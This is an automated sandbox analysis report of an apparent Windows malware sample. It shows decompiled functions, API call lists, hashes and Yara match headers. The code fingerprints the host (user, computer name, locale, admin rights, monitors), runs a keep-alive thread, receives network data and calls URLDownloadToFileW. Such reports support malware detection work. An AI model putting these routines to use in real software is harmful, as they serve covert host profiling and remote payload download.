                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000,?,?,00000000), ref: 0040D3AC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3BC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3CC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,?,?), ref: 0040D3DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040D3E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040D402
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D40E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D41A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D432
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D43E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D44A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D456
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D462
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D474
                                  • atoi.MSVCRT ref: 0040D47B
                                  • Sleep.KERNEL32(00000064), ref: 0040DD60
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DD83
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DD95
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDB0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DDBB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DDDD
                                  • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DDE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDF9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DE0D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                  • String ID: $$PowrProf.dll$SetSuspendState
                                  • API String ID: 2465730144-1158640710
                                  • Opcode ID: b44c68743557f4f09f7a9a42c0d9c3994339862daf0c9e982cee1bf9a3d0bef1
                                  • Instruction ID: 8b97f5ae68acd249977ecc05ae4d1582f654e66521c0ff460722a1e21975d306
                                  • Opcode Fuzzy Hash: b44c68743557f4f09f7a9a42c0d9c3994339862daf0c9e982cee1bf9a3d0bef1
                                  • Instruction Fuzzy Hash: D8529372900208EBDB04BBB1EC59AEE7768EF54305F10487EF512A70E2DF785A54CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409908, Relevance: 75.3, APIs: 26, Strings: 17, Instructions: 92libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00409908() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x41bc94 = _t2;
				if(_t2 == 0) {
					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x41bc94 == 0) {
					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x41bc9c = _t22;
				return _t22;
			}






                                  0x0040991b
                                  0x00409924
                                  0x0040992c
                                  0x00409933
                                  0x00409944
                                  0x00409944
                                  0x0040995f
                                  0x00409964
                                  0x00409975
                                  0x00409975
                                  0x00409993
                                  0x004099a7
                                  0x004099bb
                                  0x004099cf
                                  0x004099e3
                                  0x004099f7
                                  0x00409a0b
                                  0x00409a1c
                                  0x00409a24
                                  0x00409a28
                                  0x00409a2e

                                  APIs
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                  • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                  • API String ID: 551388010-2914448473
                                  • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                  • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402580, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66timethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
				struct _SYSTEMTIME _v20;
				char _v36;
				void* _v52;
				char* _t25;
				char* _t26;
				intOrPtr _t35;
				void* _t37;

				_t37 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t35 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x41bcac; // 0x0
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_t25 =  &_a11;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
						_t26 =  &_v36;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
						printf(_t26);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				} else {
					 *((char*)(__ecx + 0x44)) = 1;
				}
				 *((char*)(_t37 + 0x38)) = 1;
				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
				CreateThread(0, 0, E004027A2, _t37, 0, 0); // executed
				return 1;
			}










                                  0x00402588
                                  0x0040258f
                                  0x0040262f
                                  0x00000000
                                  0x0040262f
                                  0x00402599
                                  0x0040259c
                                  0x004025a4
                                  0x004025aa
                                  0x004025b0
                                  0x004025ce
                                  0x004025dc
                                  0x004025e3
                                  0x004025e7
                                  0x004025f1
                                  0x004025f8
                                  0x00402604
                                  0x0040260d
                                  0x0040260d
                                  0x0040259e
                                  0x0040259e
                                  0x0040259e
                                  0x0040261d
                                  0x00402621
                                  0x00402624
                                  0x00000000

                                  APIs
                                  • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                  • printf.MSVCRT ref: 004025F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                  • CreateThread.KERNEL32(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                  Strings
                                  • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                  • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                  • API String ID: 3715082883-586133315
                                  • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                  • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402149, Relevance: 16.6, APIs: 11, Instructions: 75networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                  • malloc.MSVCRT ref: 00402175
                                  • recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                    • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                    • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                    • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                    • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6B015DF0), ref: 00402302
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                  • String ID:
                                  • API String ID: 2200674315-0
                                  • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                  • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412163, Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00412163(intOrPtr _a4) {
				char _v5;
				char _v12;
				long _v16;
				char _v32;
				void* _v48;
				char _v80;
				short _v592;
				char* _t23;
				char* _t25;

				_v12 = 0x10;
				 *0x41c1e8(1,  &_v80,  &_v12); // executed
				_v16 = 0x100;
				GetUserNameW( &_v592,  &_v16); // executed
				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
				_t25 =  &_v32;
				L0041416A();
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}












                                  0x0041216f
                                  0x0041217d
                                  0x00412186
                                  0x00412195
                                  0x004121a5
                                  0x004121ae
                                  0x004121b9
                                  0x004121bd
                                  0x004121c9
                                  0x004121d4
                                  0x004121dd
                                  0x004121e7

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@G@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@1@@NameUserV10@V10@@
                                  • String ID:
                                  • API String ID: 3382107156-0
                                  • Opcode ID: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction ID: b94a0025ee3120f282ce46cac819fd7ffee2fdf7fe7efc1014d8e4d368efe18d
                                  • Opcode Fuzzy Hash: b8e59d28f1cfdb65fc57b1756a71ba3e9b4df3560f8848897e1e7dd21217353c
                                  • Instruction Fuzzy Hash: E301DE72C0010DEBDB01DF94DC49EDEBB7CEB48304F108062F915E2150EB75A6898FA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409E7D, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E00409E7D(void* __ecx, intOrPtr _a4) {
				char _v5;
				char _v8;

				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3); // executed
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8,  &_v5, __ecx);
				return _a4;
			}





                                  0x00409e8e
                                  0x00409e9f
                                  0x00409ea9

                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@InfoLocaleU?$char_traits@
                                  • String ID:
                                  • API String ID: 4090406865-0
                                  • Opcode ID: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction ID: 6bf4cb4ccd2def3a4df93ba3bf87f565bdd40bf68ca9332086adf1bee5c68202
                                  • Opcode Fuzzy Hash: 501cb2897031f947fe62341dcca9b5086cc5479430e65b3761638e752ef95d52
                                  • Instruction Fuzzy Hash: 80E0EC7560020DFBDB00DB90DC45ECA776CAB48745F004051BA0296190D670A7088BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408C98, Relevance: 263.4, APIs: 134, Strings: 16, Instructions: 938synchronizationthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                    • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
